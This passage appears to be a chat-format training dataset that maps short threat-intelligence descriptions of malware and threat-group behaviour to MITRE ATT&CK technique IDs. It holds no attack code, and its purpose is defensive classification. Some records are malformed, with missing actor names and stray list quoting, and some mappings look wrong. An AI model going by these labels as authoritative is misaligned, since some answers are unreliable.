clicking the screen before the malicious code runs" }, { "role": "assistant", "content": "T1497.002 - User Activity Based Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has used trojanized documents that retrieve remote templates from an adversary-controlled website." }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The size of the image is more than 600KB and embedded in it is the encrypted IcedID main module. The encryption algorithm is RC4 and the keys are also embedded in the image at specific offset" }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedAmmyy can execute batch scripts to delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The files are extracted to a newly created folder with a randomized name under the same path, and the zip file is then deleted. The “AJWrDz.exe” executable path is written to the registry Run key “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” to achieve persistency" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The FunnyDream Keyrecord component can capture keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hi-Zor encrypts C2 traffic with TLS." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some versions of the Orz backdoor have 32- and 64-bit embedded DLLs, stored internally as base64 strings. Their purpose is to simply run another binary. These are used as loaders for future executable payloads, using the well-known process hollowing technique. To use the MockDll, the backdoor creates a configuration .ini file like that shown in Figure 14" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To exploit the Log4j vulnerability (CVE-2021-44228), the attackers chose one of the publicly available open-source JNDI Exploit Kits, since removed from GitHub due to its enormous popularity following the vulnerability emergence. There are multiple analysis papers that explain how the vulnerability can be exploited, so we will skip the details of the actual exploitation step" }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CosmicDuke collects LSA secrets." }, { "role": "assistant", "content": "T1003.004 - OS Credential Dumping: LSA Secrets" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sleeps the downloader. After that, it downloads a file from Discord. The downloaded file is in reverse byte order. Downloads file from Discord. The downloader restores the downloaded file by reversing the bytes within the file. Method that reverses the downloaded file. The restored file is a DLL and serves as the third stage of the infection chain. Retrieving third-stage public methods using Type.GetMethods" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. CTU™ researchers attribute GandCrab to the GOLD GARDEN threat group" }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application', 'T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906)." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An loader Trojan uses a batch script to run its payload." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices." }, { "role": "assistant", "content": "T1499.004 - Application or System Exploitation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMess can communicate to C2 with mutual TLS where client and server mutually check certificates." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The executable dispci.exe appears to be derived from the code base of the legitimate utility DiskCryptor. It acts as the disk encryption module which also installs the modified bootloader and prevents the normal boot-up process of the infected machine." }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OverWatch continued to track the threat actor’s malicious behavior as they downloaded additional scripts and then executed a Base64-encoded command via PowerShell1 to retrieve malware from their toolkit" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Otherwise, the malware bypasses UAC and escalates privileges with two different approaches – one for Windows 10 and the other for older versions" }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can use `cmd.exe` to drop and run files." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA459 has used PowerShell for execution of a payload." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kevin can hide the current window from the targeted user via the `ShowWindow` API function." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Like many threat groups, TG-3390 conducts strategic web compromises (SWCs), also known as watering hole attacks, on websites associated with the target organization's vertical or demographic to increase the likelihood of finding victims with relevant information" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The spreadsheet also creates a scheduled task named \"windows update check\" that runs the file C:\\Users\\\\.templates\\System Manager.exe every minute." }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Molerats used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For example, at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The code will gather some information about the system, specifically the local IP address, MAC address, and the external IP address of the system" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some FinFisher variants incorporate an MBR rootkit." }, { "role": "assistant", "content": "T1542.003 - Bootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can execute JavaScript containing configuration data for establishing persistence." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KillDisk retrieves the hard disk name by calling the \"CreateFileA to \\\\.\\PHYSICALDRIVE0\" API." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Xbash can execute malicious JavaScript payloads on the victim’s machine." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackConfig has used VBS to install its downloader component and malicious documents with VBA macro code." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "According to the public source data, these airlines use services of the same IT service provider. To help companies detect and hunt for ColunmTK, we have provided a full list of indicators of compromise (IOCs) that we retrieved. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. APT41, also known as WICKED SPIDER (PANDA), Winnti Umbrella, and BARIUM, is believed to have been engaging in state-sponsored espionage in China's interests as well as committing financially motivated cybercrimes. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. Source: Group-IB Threat Intelligence & Attribution Another interesting domain is service[.]dns22[.]ml. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell can delete files from the system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Path – location of the root “stash” directory - Ext – search for files with one of these extensions only - Date – search for files not earlier than this date" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SeaDuke uses an event filter in WMI code to execute a previously dropped executable shortly after system startup." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacSpy can capture screenshots of the desktop over multiple monitors." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used malicious macros embedded inside Office documents to execute files." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "logs the keystrokes on the targeted system." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Melcoz can use MSI files with embedded VBScript for execution." }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT enumerated the Orion software Visual Studio solution directory path." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3: Script code embedded in 29[.]html used to download and run Revenge RAT The script shown in Figure 4 is almost identical to the one used by the script contents of 29[.]html (in Figure 3), the only difference being the absence of a sleep command and the usage of the “forfiles” utility" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL can run Systeminfo to gather information about the victim." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 can exfiltrate data over Google Drive." }, { "role": "assistant", "content": "T1567 - Exfiltration Over Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a module to execute Mimikatz with PowerShell to perform ." }, { "role": "assistant", "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Linfo creates a backdoor through which remote attackers can list contents of drives and search for files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has used VBS and VBE scripts for execution." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SodaMaster has the ability to download additional payloads from C2 to the targeted system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie attempts to detect several anti-virus products." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTP and HTTPS to communicate with the C2 server." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of listing files, folders, and drives on a victim." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Wocao, the threat actors obtained a variety of open source tools, including JexBoss, KeeThief, and BloodHound." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution. An interesting element is that the malware looks for filenames created with the previous version of KONNI. This implies that the malware targeted the same people as the previous version and they are designed to work together" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors exploited multiple vulnerabilities in externally facing servers." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has used WMI queries to check if various security applications were running, as well as the operating system version." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE can gather the username from an infected host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains junk code in its functions in an effort to confuse disassembly programs." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to obtain legitimate credentials during operations." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit modules are written in and executed via PowerShell." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerLess can download additional payloads to a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HIDEDRV injects a DLL for Downdelph into the explorer.exe process." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "searches for certain Registry keys to be configured before executing the payload." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRatReporter listed all running processes on the machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WarzoneRAT can create `HKCU\\Software\\Classes\\Folder\\shell\\open\\command` as a new registry key during privilege escalation." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One version of uses a PowerShell script." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA has uploaded files and information from victim machines." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skidmap has the ability to download, unpack, and decrypt tar.gz files ." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot can run a batch script named `del.bat` to remove any Saint Bot payload-linked files from a compromise system if anti-analysis or locale checks fail." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Note: the NTRUEncrypt public key cryptosystem encryption algorithm (NTRU), is a lattice-based alternative to Rivest-Shamir-Adleman, known as RSA, and Elliptic-curve cryptography, or ECC, and is based on the shortest vector problem in a lattice" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turian has the ability to take screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April. The worm specifically scans for the existence of the DoublePulsar backdoor on compromised systems. If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock. The second thread scans randomly chosen external IP addresses" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Check status, control, and end processes and services. Create, modify, and delete registry subkeys. Retrieve a list of logical drives" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One example of these samples is given below: SHA256:6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb The file is a self-extracting RAR, which is a common delivery mechanism for PlugX particularly when the eventual payload will be sideloaded by a legitimate executable" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBSRAT has been seen loaded into msiexec.exe through process hollowing to hide its execution." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Its purpose is to load Msadoz.dll in order to decrypt and execute it in memory" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 leveraged privileged accounts to replicate directory service data with domain controllers." }, { "role": "assistant", "content": "T1003.006 - OS Credential Dumping: DCSync" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Given this extended period, it is logical to assume that some credentials obtained by the threat actor would be rotated during normal business operations. To combat this, the threat actor periodically “refreshed” their credential set by performing credential theft activities in an already compromised environment. At one victim, CrowdStrike identified multiple instances of domain credential theft months apart, each time with a different credential theft technique" }, { "role": "assistant", "content": "T1589.001 - Credentials" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use Mshta.exe to execute additional payloads on compromised hosts." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used PowerShell scripts for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If I open up the WebCacheV01.dat file in ESEDatabaseView or BrowsingHistoryView, I see browsing history leading up to my testing. Initially, I thought it was grabbing a copy of the file from a previous Volume Shadow Copy (VSC) but that isn’t the case. 